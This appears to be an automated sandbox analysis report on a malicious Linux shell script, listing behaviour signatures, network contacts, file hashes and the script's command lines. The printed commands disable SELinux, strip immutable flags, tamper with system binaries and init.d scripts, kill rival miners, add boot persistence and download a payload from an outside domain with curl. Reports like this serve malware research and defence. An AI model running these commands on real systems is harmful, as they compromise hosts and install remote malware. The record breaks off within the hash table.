Analysis Overview
SHA256
3e676ba390fe4cd218577761efacd4ef39eedfb1014832e63aa8e1b32614773b
Threat Level: Shows suspicious behavior
The file HMtWYpJGZVUZkrQK.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Enumerates running processes
Write file to user bin folder
Attempts to change immutable files
Disables SELinux
Modifies init.d
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Checks CPU configuration
Reads CPU attributes
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-13 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sed4AVVs6 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed95Ns9Y | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedivgDd0 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedUHt3QU | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedf0ume1 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedFhHFT5 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedxP3LUa | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedZQsazd | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedy6LbFS | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedjEUNSW | /bin/sed | N/A |
| File opened for modification | /etc/init.d/seduODJR1 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedPHaP3Z | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedHcZzv2 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedqSWgm6 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed6ZnCQ4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedhV0UxX | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2Wb2GX | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedniYnE7 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed6AQ9Lb | /bin/sed | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedzJUsG1 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedItU9o3 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedVHPgf6 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedSqez28 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedpoTtb8 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedpxfBNa | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedkz6RZ9 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedQvKbJd | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed9ofuDY | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedIOKVd3 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sed9jkXc4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed7uNT72 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedBeMLr8 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedWFScV8 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAxh40X | /bin/sed | N/A |
| File opened for modification | /etc/init.d/seduA5xv0 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedHZKD74 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedEGBpj7 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAPrblb | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed0GUKie | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedDFOGpV | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedWoCetZ | /bin/sed | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1489/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1045/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/458/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/755/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/311/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1145/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1283/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/511/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1155/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1491/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1078/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/406/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/404/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/168/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1489/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1364/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/159/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/425/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/408/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/159/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/241/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/902/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/83/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1117/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/25/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/598/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1134/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1270/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1364/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/978/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1059/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /bin/mount | N/A |
| File opened for reading | /proc/311/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/137/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/858/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/436/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/168/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/970/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1140/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/162/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1306/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/672/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1160/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/315/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/159/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/26/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1117/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/446/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/82/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1118/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/98/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/776/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1127/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/157/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/568/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/241/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1092/cmdline | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.BubyqF | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.yJP6CF | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin/lsof]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/acpid]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/anacron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apparmor]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/apport]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/avahi-daemon]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/bluetooth]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cups-browsed]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dns-clean]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/gdm3]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/grub-common]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/irqbalance]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kerneloops]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/network-manager]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/plymouth-log]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/pppd-dns]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsync]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/saned]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/speech-dispatcher]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/spice-vdagent]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ufw]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/unattended-upgrades]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/uuidd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/whoopsie]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/usr/bin/sort
[sort -u]
/bin/grep
[grep -o /proc/[0-9]\+]
/bin/mount
[mount]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | 0889.org | udp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
/etc/sedTc6x7S
| MD5 | 8f111d100ea459f68d333d63a8ef2205 |
| SHA1 | 077ca9c46a964de67c0f7765745d5c6f9e2065c3 |
| SHA256 | 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354 |
| SHA512 | d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb |
/etc/init.d/sedy6LbFS
| MD5 | 2ba41d3445b3052d9d2d170b7a9c30dc |
| SHA1 | 2aac9677a1a8815cf504e95c4191efa4e8bf277c |
| SHA256 | d1bed899252d0ce9df29a9f46f2883f3a66ac084557757b2ee0300fc03f442e1 |
| SHA512 | 40694eee83d8c9f2b22651cb51bf3827659ef8e58e5d127b117b7fdf8c42685525e9bbb8270c8e47043a71ff62218d9dc977d29aff5b7a0205c461af70cd53d8 |
/etc/init.d/sedjEUNSW
| MD5 | 9b392bac8c24330ad47478a5038ead13 |
| SHA1 | 6c3050598d168c42dc688cecb77fe478211c3ab9 |
| SHA256 | d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f |
| SHA512 | 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462 |
/etc/init.d/sedDFOGpV
| MD5 | cda555b495531d9519e1759015d8254b |
| SHA1 | d24025f32795eb1156c8cf6ed431b0d62c371e0b |
| SHA256 | bada520ca2c152cc2a4ce0507dae5525bd3edc0b83c1ac4b460b77a90e4667d4 |
| SHA512 | 8a67db9e0dc5f95ec72f9bc07b7b9748ad23b272acaebff9cc1748b59e493ab6761e5e68fc9fe0e0b3783a13eba652b7f6bd5761cf0bbe4f684dabe21e543f46 |
/etc/init.d/sedUHt3QU
| MD5 | 458ba0335ba2c1c2dce836092bc736d6 |
| SHA1 | ae5d8e397170d4aa1449ad21202c192822965300 |
| SHA256 | e6e7f380dcf27f1af57e69b89683892cf84364a1c70a6830a869da24834a481a |
| SHA512 | 3e6aea402485a84f63d8a1e984b67f4c9ef8c002f62998953c86dfbc9895057af5c9f9e201d2e478b74c49d8f8f0a526899225cdf65850f54e0992e50e8fcb9f |
/etc/init.d/sed95Ns9Y
| MD5 | 3d51dc9135014bb49b4a19ff8dab61f1 |
| SHA1 | da7e67342302a2ccb0b28b3fdc3005fded638dd8 |
| SHA256 | b80a447135b01da97780c2c5b7876ded18d788940a5365bc308d68b0d1a736cc |
| SHA512 | 9e90166259db2e64554529003cc090bce5d4b3585dd05ae2c8392058340f96b7d32a04641436a0291e2e5892391420cd3c6eca10a27b241d3dacc47b85c0b152 |
/etc/init.d/sedWoCetZ
| MD5 | ce2de503acc3de02f544571e89d4d717 |
| SHA1 | 5d767b14666d82389475868f153a38594acce7ae |
| SHA256 | 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2 |
| SHA512 | 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440 |
/etc/init.d/sed9ofuDY
| MD5 | 03975a59225fad7d7c28e133de85d249 |
| SHA1 | 6f72b3b528550f16a2109bc9d86004180d7d734f |
| SHA256 | 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65 |
| SHA512 | e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e |
/etc/init.d/sedAxh40X
| MD5 | 7e648c77846d70c4ef1b49c0c4f7cfad |
| SHA1 | 92bff2c0b65410bfeb8cde8089888f4a22b73e44 |
| SHA256 | 2e317e678625e7c41348f15d2fb8fd65fd2ba732da05bf89660de2b36558e405 |
| SHA512 | 054e9102ab3f8799d8ff6c07d82ba571fb72ce9d5eab8fca50ff055608333e6f6ef2805cf349cd2c9ae793fc9c2fad8e11f52d455517e3ea118f0780b89d0a4a |
/etc/init.d/sedhV0UxX
| MD5 | 33ed7811d65a775cf10f04c2e6ee3cbf |
| SHA1 | 004e8008b0f8dda526e982e148eb39c207af44b8 |
| SHA256 | 29ad66aed4b605c1ff65d42c89f5b68f570c88c1d5764f45dcf15384302b86fe |
| SHA512 | 1f732ab834a000734d06a5242e0fd174a09aa76771b00d27d5c15169bcf26cec8c04af6395eb42382ce1585247f83065cecbf6b7661ad91e38b4f5a202f7b0c6 |
/etc/init.d/sed2Wb2GX
| MD5 | 510488b5120b580b673a15b75a5498b0 |
